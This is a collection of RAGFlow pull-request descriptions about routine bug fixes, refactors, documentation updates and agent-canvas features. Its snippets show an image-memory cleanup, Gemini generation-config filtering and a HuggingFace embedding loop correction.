### What problem does this PR solve?
This PR addresses critical memory leaks in the task executor's image
processing pipeline. The current implementation fails to properly
dispose of PIL Image objects and BytesIO buffers during chunk
processing, leading to progressive memory accumulation that can cause
the task executor to consume excessive memory over time.
### Background context
- The `upload_to_minio` function processes images from document chunks
and converts them to JPEG format for storage.
- PIL Image objects hold significant memory resources that must be
explicitly closed to prevent memory leaks.
- BytesIO objects also consume memory and should be properly disposed of
after use.
- In high-throughput scenarios with many image-containing documents,
these memory leaks can lead to out-of-memory errors and degraded
performance.
### Specific issues fixed
- PIL Image objects were not being explicitly closed after processing.
- BytesIO buffers lacked proper cleanup in all code paths.
- Converted images (RGBA/P to RGB) were not disposing of the original
image object.
- Memory references to large image data were not being cleared promptly.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Performance Improvement
### Changes made
- Added explicit `d["image"].close()` calls after image processing
operations.
- Implemented proper cleanup of converted images when changing formats
from RGBA/P to RGB.
- Enhanced BytesIO cleanup with `try/finally` blocks to ensure disposal
in all code paths.
- Added explicit `del d["image"]` to clear memory references after
processing.
This fix ensures stable memory usage during long-running document
processing tasks and prevents potential out-of-memory conditions in
production environments.
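The cleanup pattern described above can be sketched roughly as follows. This is a minimal illustration, not the actual `upload_to_minio` code: `FakeImage` is a hypothetical stand-in for a PIL image so the example runs without Pillow, and `encode_and_release` is an assumed helper name.

```python
import io


class FakeImage:
    """Hypothetical stand-in for a PIL image; records whether close() ran."""

    def __init__(self, mode="RGBA"):
        self.mode = mode
        self.closed = False

    def convert(self, mode):
        # Like PIL, conversion returns a new object and leaves the original open.
        return FakeImage(mode)

    def save(self, buffer, format="JPEG"):
        buffer.write(b"jpeg-bytes")

    def close(self):
        self.closed = True


def encode_and_release(d):
    """Encode d["image"] to bytes, releasing images and buffer on every path."""
    original = d["image"]
    converted = None
    buffer = io.BytesIO()
    try:
        image = original
        if original.mode in ("RGBA", "P"):
            converted = original.convert("RGB")
            image = converted
        image.save(buffer, format="JPEG")
        return buffer.getvalue()
    finally:
        buffer.close()
        if converted is not None:
            converted.close()
        original.close()
        del d["image"]  # drop the reference so the pixel data can be collected
```

The `finally` block runs whether or not `save` raises, which is what keeps the buffer and both image objects from lingering.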
### What problem does this PR solve?
Improve the logic that checks whether a task has been cancelled.
### Type of change
- [x] Refactoring
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
stack:
```
2025-06-26 17:22:24,739 ERROR 1609 list index out of range
Traceback (most recent call last):
File "/ragflow/.venv/lib/python3.10/site-packages/flask/app.py", line 880, in full_dispatch_request
rv = self.dispatch_request()
File "/ragflow/.venv/lib/python3.10/site-packages/flask/app.py", line 865, in dispatch_request
return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) # type: ignore[no-any-return]
File "/ragflow/api/utils/api_utils.py", line 298, in decorated_function
return func(*args, **kwargs)
File "/ragflow/api/apps/sdk/session.py", line 472, in list_session
print(conv["reference"][message_num])
IndexError: list index out of range
```

### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Add StringTransform operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
In the prompt-editor component under the `web` folder, the cursor
position is wrong when content is entered for the first time, and the
text wraps to a new line automatically.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: leonlai <owllai123456>
### What problem does this PR solve?
Fix chunk number error after re-parsing. #8503.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Displays the output variable type selected by the loop operator
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Include optional `tag_feas` field if present in request
- Add input validation for `important_kwd` and `question_kwd` to ensure
they are lists
- #8462
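A rough sketch of the validation described above, assuming the request body is a plain dict. The function names and the error wording are hypothetical, not taken from the PR.

```python
def validate_chunk_payload(req):
    """Return (ok, message) for a hypothetical chunk-update request body."""
    for key in ("important_kwd", "question_kwd"):
        if key in req and not isinstance(req[key], list):
            return False, f"`{key}` should be a list"
    return True, ""


def build_chunk_fields(req):
    """Copy only the fields that are present, including the optional tag_feas."""
    fields = {}
    for key in ("important_kwd", "question_kwd", "tag_feas"):
        if key in req:
            fields[key] = req[key]
    return fields
```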
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Customize the output variable name of the loop operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add UserFillUpForm component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add MCP dashboard functionalities list_tools and test_tool.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR addresses an issue in the presentation parser where the
`layout_recognize` configuration was incorrectly retrieved from
`kwargs.get("layout_recognize", "DeepDOC")`. Instead, it should be
sourced from the `parser_config` parameter, specifically
`parser_config.get("layout_recognize", "DeepDOC")`.
This mismatch could cause the parser to default to the "DeepDOC" layout
recognizer, ignoring any alternative recognition method specified in the
parser configuration. As a result, PDF document parsing might use an
incorrect recognition engine.
The fix ensures the presentation parser consistently uses the
`layout_recognize` setting from `parser_config`, aligning with the
configuration access patterns used elsewhere in the codebase.
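The difference between the two lookups can be illustrated in isolation. Both functions below are hypothetical reductions of the parser entry point, and `"Plain Text"` is only an assumed example of a non-default recognizer value.

```python
def pick_layout_recognizer_buggy(parser_config=None, **kwargs):
    # Reads from kwargs, so a value set in parser_config is never seen.
    return kwargs.get("layout_recognize", "DeepDOC")


def pick_layout_recognizer(parser_config=None, **kwargs):
    # Reads from parser_config, falling back to "DeepDOC" only when unset.
    parser_config = parser_config or {}
    return parser_config.get("layout_recognize", "DeepDOC")
```

With `parser_config={"layout_recognize": "Plain Text"}`, the first version silently falls back to `"DeepDOC"` while the second honors the configured value.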
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Allow operators inside the loop operator to reference the output
parameters of external operators #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add retrieval tool #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR adds fields to the `Chunk` class to store retrieval results like
similarity scores, term similarity, vector similarity, positions, and
document type. This allows the chunk object to hold all the information
needed when returning search results from the vector database.
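As an illustration only, a chunk object carrying these retrieval fields might look like the dataclass below. The field names and types are assumptions made for the sketch; the real `Chunk` class may name or type them differently.

```python
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class Chunk:
    # Identity and content (assumed pre-existing fields).
    id: str
    content: str
    # Retrieval results; None means the chunk did not come from a search.
    similarity: Optional[float] = None
    term_similarity: Optional[float] = None
    vector_similarity: Optional[float] = None
    positions: List[List[int]] = field(default_factory=list)
    doc_type: Optional[str] = None
```

Defaulting the retrieval fields keeps existing call sites that build a `Chunk` without search metadata working unchanged.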
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Previous:
- Defaulted to hardcoded model 'BAAI/bge-large-zh-v1.5@BAAI'
- Did not respect user-configured default embedding_model
Now:
- Correctly prioritizes user-configured default embedding_model
Other:
- Make embedding_model optional in CreateDatasetReq with proper None
handling
- Add default embedding model fallback in dataset update when empty
- Enhance validation utils to handle None values and string
normalization
- Update SDK default embedding model to None to match API changes
- Adjust related test cases to reflect new validation rules
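The new priority order can be sketched as a small helper. `resolve_embedding_model` and its parameter names are hypothetical; the sketch only assumes that an omitted or blank value should fall back to the user-configured default.

```python
def resolve_embedding_model(requested, tenant_default):
    """Prefer an explicit model; otherwise use the user-configured default."""
    if requested is not None:
        requested = requested.strip()  # normalize stray whitespace
    return requested or tenant_default
```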
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/8324
docker image version: v0.19.1
The `_clean_conf` function was defined but never called in the `_chat`
and `chat_streamly` methods of the `GeminiChat` class, causing the error
"Unknown field for GenerationConfig: max_tokens" when the default LLM
config includes the "max_tokens" parameter.
**Buggy code (`ragflow/rag/llm/chat_model.py`)**
```python
class GeminiChat(Base):
    def __init__(self, key, model_name, base_url=None, **kwargs):
        super().__init__(key, model_name, base_url=base_url, **kwargs)
        from google.generativeai import GenerativeModel, client

        client.configure(api_key=key)
        _client = client.get_default_generative_client()
        self.model_name = "models/" + model_name
        self.model = GenerativeModel(model_name=self.model_name)
        self.model._client = _client

    def _clean_conf(self, gen_conf):
        for k in list(gen_conf.keys()):
            if k not in ["temperature", "top_p"]:
                del gen_conf[k]
        return gen_conf

    def _chat(self, history, gen_conf):
        from google.generativeai.types import content_types

        system = history[0]["content"] if history and history[0]["role"] == "system" else ""
        hist = []
        for item in history:
            if item["role"] == "system":
                continue
            hist.append(deepcopy(item))
            item = hist[-1]
            if "role" in item and item["role"] == "assistant":
                item["role"] = "model"
            if "role" in item and item["role"] == "system":
                item["role"] = "user"
            if "content" in item:
                item["parts"] = item.pop("content")
        if system:
            self.model._system_instruction = content_types.to_content(system)
        response = self.model.generate_content(hist, generation_config=gen_conf)
        ans = response.text
        return ans, response.usage_metadata.total_token_count

    def chat_streamly(self, system, history, gen_conf):
        from google.generativeai.types import content_types

        if system:
            self.model._system_instruction = content_types.to_content(system)
        # ❌ _clean_conf was not called; this inline filter lets max_tokens through
        for k in list(gen_conf.keys()):
            if k not in ["temperature", "top_p", "max_tokens"]:
                del gen_conf[k]
        for item in history:
            if "role" in item and item["role"] == "assistant":
                item["role"] = "model"
            if "content" in item:
                item["parts"] = item.pop("content")
        ans = ""
        try:
            response = self.model.generate_content(history, generation_config=gen_conf, stream=True)
            for resp in response:
                ans = resp.text
                yield ans
            yield response._chunks[-1].usage_metadata.total_token_count
        except Exception as e:
            yield ans + "\n**ERROR**: " + str(e)
        yield 0
```
**Fixed code: call `_clean_conf` in both methods**
```python
class GeminiChat(Base):
    def __init__(self, key, model_name, base_url=None, **kwargs):
        super().__init__(key, model_name, base_url=base_url, **kwargs)
        from google.generativeai import GenerativeModel, client

        client.configure(api_key=key)
        _client = client.get_default_generative_client()
        self.model_name = "models/" + model_name
        self.model = GenerativeModel(model_name=self.model_name)
        self.model._client = _client

    def _clean_conf(self, gen_conf):
        for k in list(gen_conf.keys()):
            if k not in ["temperature", "top_p"]:
                del gen_conf[k]
        return gen_conf

    def _chat(self, history, gen_conf):
        from google.generativeai.types import content_types

        # ✅ Call _clean_conf to drop unsupported parameters
        gen_conf = self._clean_conf(gen_conf)
        system = history[0]["content"] if history and history[0]["role"] == "system" else ""
        hist = []
        for item in history:
            if item["role"] == "system":
                continue
            hist.append(deepcopy(item))
            item = hist[-1]
            if "role" in item and item["role"] == "assistant":
                item["role"] = "model"
            if "role" in item and item["role"] == "system":
                item["role"] = "user"
            if "content" in item:
                item["parts"] = item.pop("content")
        if system:
            self.model._system_instruction = content_types.to_content(system)
        response = self.model.generate_content(hist, generation_config=gen_conf)
        ans = response.text
        return ans, response.usage_metadata.total_token_count

    def chat_streamly(self, system, history, gen_conf):
        from google.generativeai.types import content_types

        # ✅ Call _clean_conf to drop unsupported parameters
        gen_conf = self._clean_conf(gen_conf)
        if system:
            self.model._system_instruction = content_types.to_content(system)
        # ✅ Removed the duplicate inline filter "for k in list(gen_conf.keys()):"
        for item in history:
            if "role" in item and item["role"] == "assistant":
                item["role"] = "model"
            if "content" in item:
                item["parts"] = item.pop("content")
        ans = ""
        try:
            response = self.model.generate_content(history, generation_config=gen_conf, stream=True)
            for resp in response:
                ans = resp.text
                yield ans
            yield response._chunks[-1].usage_metadata.total_token_count
        except Exception as e:
            yield ans + "\n**ERROR**: " + str(e)
        yield 0
```
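For reference, the filtering step can be exercised on its own. The sketch below is a standalone variant rather than the method from the PR: it returns a filtered copy instead of deleting keys in place, and `ALLOWED_KEYS` and `clean_conf` are illustrative names.

```python
# Keys the generation config is assumed to accept, mirroring _clean_conf above.
ALLOWED_KEYS = ("temperature", "top_p")


def clean_conf(gen_conf):
    """Return a copy of gen_conf that keeps only the allowed keys."""
    return {k: v for k, v in gen_conf.items() if k in ALLOWED_KEYS}
```

Returning a copy leaves the caller's dict untouched, which may matter if the same default config is reused across requests.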
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Filter the query variable drop-down box options by type #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR fixes a typo in the variable name `succesfulFilenames`,
correcting it to `successfulFilenames`. This ensures consistency and
avoids potential errors due to the misspelled variable.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: when using external components, it was impossible to specify the
port, because the variables in `docker/.env` were not referenced by
`docker/service_conf.yaml.template`.
382d2d0373/docker/.env (L85)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Insert the node data of the bottom subagent into the tool array of
the head agent #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Using the QA chunking method with a large PDF (e.g., 300+ pages) may
lead to OOM in the ragflow-worker module.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add MCP streamable-http transport.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/8466
After going through the code, the current logic is as follows:
when `do_handle_task` raises an exception, `handle_task` sets the
progress. In some cases, however, `do_handle_task` returns early without
setting the correct progress. In those cases the Redis stream message is
acked while the task is still marked as running.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Add MCP server dashboard operations.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
This PR fixes #8271 by widening a column's type from int to float when
any value in the column falls outside the range of the long type.
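A minimal sketch of that rule, assuming a signed 64-bit long. The function names and the `"long"`/`"float"` labels are hypothetical and only illustrate the decision.

```python
INT64_MIN, INT64_MAX = -(2**63), 2**63 - 1


def column_type(values):
    """Pick "long" when every integer fits in 64 bits, else "float"."""
    if all(INT64_MIN <= v <= INT64_MAX for v in values):
        return "long"
    return "float"


def coerce_column(values):
    """Convert the whole column to float if any value overflows the long range."""
    if column_type(values) == "long":
        return list(values)
    return [float(v) for v in values]
```

Note that converting to float trades exactness for range: very large integers may no longer be represented exactly.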
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add IterationNode component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Saving an RGBA image directly as JPEG will cause an error. If the image
is in RGBA mode, convert it to RGB mode before saving it in JPG format.
### What problem does this PR solve?
During document parsing in the knowledge base, we occasionally encounter
the error 'cannot write mode RGBA as JPEG.' This occurs because images
in RGBA mode cannot be directly saved as JPEG. They must be converted
first before saving.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Add new test suite for document app with
create/list/parse/upload/remove tests
- Update API URLs to use version variable from config in HTTP and web
API tests
### Type of change
- [x] Add test cases
### What problem does this PR solve?
Before the refactor:
1. Create the file record.
2. Add the file to blob storage.
If an exception occurs at step 2, the database holds a file record with
no corresponding blob, which can introduce bugs.
After the refactor:
1. Add the file to blob storage.
2. Create the file record.
If step 1 succeeds but step 2 fails, only an orphaned blob is left in
blob storage, which users will not notice.
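The reordering can be sketched with in-memory stand-ins. `InMemoryBlobStore`, `InMemoryFileTable`, and `save_file` are hypothetical names used only to show why writing the blob first leaves a harmless failure mode.

```python
class InMemoryBlobStore:
    """Hypothetical blob storage backed by a dict."""

    def __init__(self):
        self.blobs = {}

    def put(self, key, data):
        self.blobs[key] = data


class InMemoryFileTable:
    """Hypothetical file-record table; can be told to fail on insert."""

    def __init__(self, fail=False):
        self.rows = {}
        self.fail = fail

    def insert(self, key, size):
        if self.fail:
            raise RuntimeError("database unavailable")
        self.rows[key] = {"size": size}


def save_file(blob_store, file_table, key, data):
    blob_store.put(key, data)          # step 1: write the blob
    file_table.insert(key, len(data))  # step 2: record it only after the blob exists
```

If the insert fails, the table never references a missing blob; the only leftover is an unreferenced blob.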
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Feat: Delete the agent and tool nodes downstream of the agent node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
image_version: v0.19.1
This PR fixes a bug in the `HuggingFaceEmbed` embedding method that
caused `AssertionError: assert len(vects) == len(docs)` during the
document embedding process.
#### Problem
The HuggingFaceEmbed.encode() method had an early return statement
inside the for loop, causing it to return after processing only the
first text input instead of processing all texts in the input list.
**Error message**
```python
AssertionError: assert len(vects) == len(docs) # input chunks != embedded vectors from embedding api
File "/ragflow/rag/svr/task_executor.py", line 442, in embedding
```
**Buggy code(/ragflow/rag/llm/embedding_model.py)**
```python
class HuggingFaceEmbed(Base):
    def __init__(self, key, model_name, base_url=None):
        if not model_name:
            raise ValueError("Model name cannot be None")
        self.key = key
        self.model_name = model_name.split("___")[0]
        self.base_url = base_url or "http://127.0.0.1:8080"

    def encode(self, texts: list):
        embeddings = []
        for text in texts:
            response = requests.post(...)
            if response.status_code == 200:
                try:
                    embedding = response.json()
                    embeddings.append(embedding[0])
                    # ❌ Early return
                    return np.array(embeddings), sum([num_tokens_from_string(text) for text in texts])
                except Exception as _e:
                    log_exception(_e, response)
            else:
                raise Exception(...)
```
**Fixed code (this function is rolled back to its v0.19.0 version)**
```python
class HuggingFaceEmbed(Base):
    def __init__(self, key, model_name, base_url=None):
        if not model_name:
            raise ValueError("Model name cannot be None")
        self.key = key
        self.model_name = model_name.split("___")[0]
        self.base_url = base_url or "http://127.0.0.1:8080"

    def encode(self, texts: list):
        embeddings = []
        for text in texts:
            response = requests.post(...)
            if response.status_code == 200:
                embedding = response.json()
                embeddings.append(embedding[0])  # ✅ Only append, no return
            else:
                raise Exception(...)
        return np.array(embeddings), sum([num_tokens_from_string(text) for text in texts])  # ✅ Return after processing all
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Use the message_id returned by the interface as the id of the
reply message #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This is a cherry-pick from #7781 as requested.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Update `.env` so that it defaults to the v0.19.1-slim edition.
### Type of change
- [x] Other (please describe): Update `.env` so that it defaults to the
v0.19.1-slim edition
### What problem does this PR solve?
- Simplify AzureChat constructor by passing base_url directly
- Clean up spacing and formatting in chat_model.py
- Remove redundant parentheses and improve code consistency
- #8423
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
### Type of change: Documentation Update/Refactoring
#### Summary
Adds HTTPS/SSL configuration guide/example to enable secure RAGFlow
deployments with proper certificate management.
#### Changes
- New HTTPS Setup Section: Step-by-step guide for SSL certificate
configuration
- Let's Encrypt Integration: Complete Certbot setup instructions
- Docker Configuration: Volume mapping examples for certificates
#### Key Features
- Prerequisites checklist
- Docker Compose configuration examples
- Support for both Let's Encrypt and existing certificates
#### Files Modified
- `README.md`
- `ragflow.https.conf` (new file)
### What problem does this PR solve?
Feat: The delete button is displayed only when the cursor is hovered
over the connection line #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
**Context and Purpose:**
This PR automatically remediates a security vulnerability:
- **Description:** Detected possible formatted SQL query. Use
parameterized queries instead.
- **Rule ID:**
python.lang.security.audit.formatted-sql-query.formatted-sql-query
- **Severity:** HIGH
- **File:** rag/utils/opendal_conn.py
- **Lines Affected:** 98 - 98
This change is necessary to protect the application from potential
security risks associated with this vulnerability.
**Solution Implemented:**
The automated remediation process has applied the necessary changes to
the affected code in `rag/utils/opendal_conn.py` to resolve the
identified issue.
Please review the changes to ensure they are correct and integrate as
expected.
### What problem does this PR solve?
Feat: Solved the conflict between the Handle click and drag events of
the canvas node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
#8391, #8404
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Add Tavily operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue where tag content would overflow the container
#8392
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Improve the tavily form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: code debugging could be corrupted by answers from the history.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add curl example for interacting with the RAGFlow MCP server. Special
thanks to @writinwaters for his expert refinement.
### Type of change
- [x] Documentation Update
---------
Co-authored-by: writinwaters <cai.keith@gmail.com>
### What problem does this PR solve?
Feat: Synchronize the data of the tavily form to the canvas node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Deleting the last tool of the agent will delete the tool node
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Save the agent tool data to the node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Update Docker image version badges and references from v0.19.0 to
v0.19.1
- Modify version mentions in all localized README files (id, ja, ko,
pt_br, tzh, zh)
- Update version in docker/README.md and related documentation files
- Includes updates to Helm values and Python SDK dependencies
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
- Correct boolean parsing for 'desc' parameter in document_app.py to
properly handle string values
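The underlying pitfall is that any non-empty string, including `"false"`, is truthy in Python. A hedged sketch of string-aware parsing follows; `parse_desc` is a hypothetical helper, and treating everything except `"false"` as true is an assumption about the intended behavior.

```python
def parse_desc(raw, default=True):
    """Interpret a query-string value for 'desc' as a boolean."""
    if raw is None:
        return default
    # bool("false") would be True, so compare the text explicitly.
    return raw.strip().lower() != "false"
```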
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fixes a minor grammar issue in a user-facing error message. The original
message said "large than" instead of the correct comparative form
"larger than". Just a quick fix I noticed while reading the code.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue where the initial value of the slice method was not
displayed in the dialog box #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
1. rename var
2. update if statement
### Type of change
- [x] Refactoring
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Add a tool operator node from the agent form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix illegal variable name in Jinja2. #8316.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix sandbox standalone context error. #8307.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add tool nodes and tool drop-down menu #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add child nodes and their connecting lines by clicking #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Highlight current language in README badges by changing color for
Traditional and Simplified Chinese
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
- Replace hardcoded 255-byte file name length checks with
FILE_NAME_LEN_LIMIT constant
- Update error messages to show the actual limit value
- #8290
### Type of change
- [x] Refactoring
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
- Add validation for empty filenames in document_app.py and trim
whitespace
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add a child operator node by clicking the operator node anchor
point #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Modify the anchor point positioning of the classification operator
node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Update readme
### Type of change
- [x] Documentation Update
- [x] Refactoring
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
- Add filename length validation (<=255 bytes) for document
upload/rename in both HTTP and SDK APIs
- Update error messages for consistency
- Fix comparison operator in SDK from '>=' to '>' for filename length
check
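A small sketch of the length check, assuming the limit applies to the UTF-8 encoded name. `FILE_NAME_LEN_LIMIT` reuses the 255-byte value stated above, and `filename_too_long` is a hypothetical helper name.

```python
FILE_NAME_LEN_LIMIT = 255  # bytes


def filename_too_long(name):
    """True only when the encoded name exceeds the limit ('>' rather than '>=')."""
    return len(name.encode("utf-8")) > FILE_NAME_LEN_LIMIT
```

Using `>` means a name of exactly 255 bytes is accepted, and counting bytes rather than characters means multi-byte characters reach the limit sooner.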
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Use the node ID as the key to destroy different types of form
components to switch the form values of the same type of operators
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed the issue where the parameters could not be set after
switching the large model parameter template. #8282
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add documentation of authorization header for MCP server based on OAuth
2.1
### Type of change
- [x] Documentation Update
---------
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### Description
This PR introduces two new environment variables, `DOC_BULK_SIZE` and
`EMBEDDING_BATCH_SIZE`, to allow flexible tuning of batch sizes for
document parsing and embedding vectorization in RAGFlow. By making these
parameters configurable, users can optimize performance and resource
usage according to their hardware capabilities and workload
requirements.
### What problem does this PR solve?
Previously, the batch sizes for document parsing and embedding were
hardcoded, limiting the ability to adjust throughput and memory
consumption. This PR enables users to set these values via environment
variables (in `.env`, Helm chart, or directly in the deployment
environment), improving flexibility and scalability for both small and
large deployments.
- `DOC_BULK_SIZE`: Controls how many document chunks are processed in a
single batch during document parsing (default: 4).
- `EMBEDDING_BATCH_SIZE`: Controls how many text chunks are processed
in a single batch during embedding vectorization (default: 16).
This change updates the codebase, documentation, and configuration files
to reflect the new options.
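As a rough illustration of how such variables might be consumed, the sketch below reads a positive integer from the environment and splits work into batches. `env_int` and `batches` are hypothetical helpers, and falling back to the default on invalid input is an assumption rather than documented behavior.

```python
import os


def env_int(name, default):
    """Read a positive integer from the environment, else use the default."""
    raw = os.environ.get(name, "")
    try:
        value = int(raw)
    except ValueError:
        return default
    return value if value > 0 else default


def batches(items, size):
    """Yield consecutive slices of at most `size` items."""
    for start in range(0, len(items), size):
        yield items[start:start + size]
```

For example, `batches(chunks, env_int("EMBEDDING_BATCH_SIZE", 16))` would embed 16 chunks at a time unless the variable says otherwise.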
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [x] Performance Improvement
- [ ] Other (please describe):
### Additional context
- Updated `.env`, `helm/values.yaml`, and documentation to describe
the new variables.
- Modified relevant code paths to use the environment variables instead
of hardcoded values.
- Users can now tune these parameters to achieve better throughput or
reduce memory usage as needed.
Before:
Default value:
<img width="643" alt="image"
src="https://github.com/user-attachments/assets/086e1173-18f3-419d-a0f5-68394f63866a"
/>
After:
10x:
<img width="777" alt="image"
src="https://github.com/user-attachments/assets/5722bbc0-0bcb-4536-b928-077031e550f1"
/>
### What problem does this PR solve?
Fix mixing different embedding models in document parsing.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
This PR fixes two issues in the OpenDAL storage connector:
1. The `health` method was missing, which prevented health checks on
the storage backend.
2. The initialization of the `opendal.Operator` object included a
redundant scheme parameter, causing unnecessary duplication and
potential confusion.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### Background
- The absence of a `health` method made it difficult to verify the
availability and reliability of the storage service.
- Initializing `opendal.Operator` with both `self._scheme` and
unpacked `**self._kwargs` could lead to errors or unexpected behavior
if the scheme was already included in the kwargs.
### What is changed and how it works?
- Adds a `health` method that writes a test file to verify storage
availability.
- Removes the duplicate scheme parameter from the `opendal.Operator`
initialization to ensure clarity and prevent conflicts.
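The idea of a write-based health check can be sketched without the real backend. `InMemoryOperator` is a hypothetical stand-in exposing only a `write(path, data)` method, and the probe path and the choice to return a boolean instead of raising are assumptions.

```python
class InMemoryOperator:
    """Hypothetical stand-in for a storage operator with a write method."""

    def __init__(self):
        self.files = {}

    def write(self, path, data):
        self.files[path] = data


class Storage:
    def __init__(self, operator):
        self._operator = operator

    def health(self):
        """Write a small probe file; report False if the backend rejects it."""
        try:
            self._operator.write("health_check", b"ok")
            return True
        except Exception:
            return False
```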
before:
<img width="762" alt="WeCom screenshot_46be646f-2e99-4e5e-be67-b1483426e77c"
src="https://github.com/user-attachments/assets/acecbb8c-4810-457f-8342-6355148551ba"
/>
<img width="767" alt="image"
src="https://github.com/user-attachments/assets/147cd5a2-dde3-466b-a9c1-d1d4f0819e5d"
/>
after:
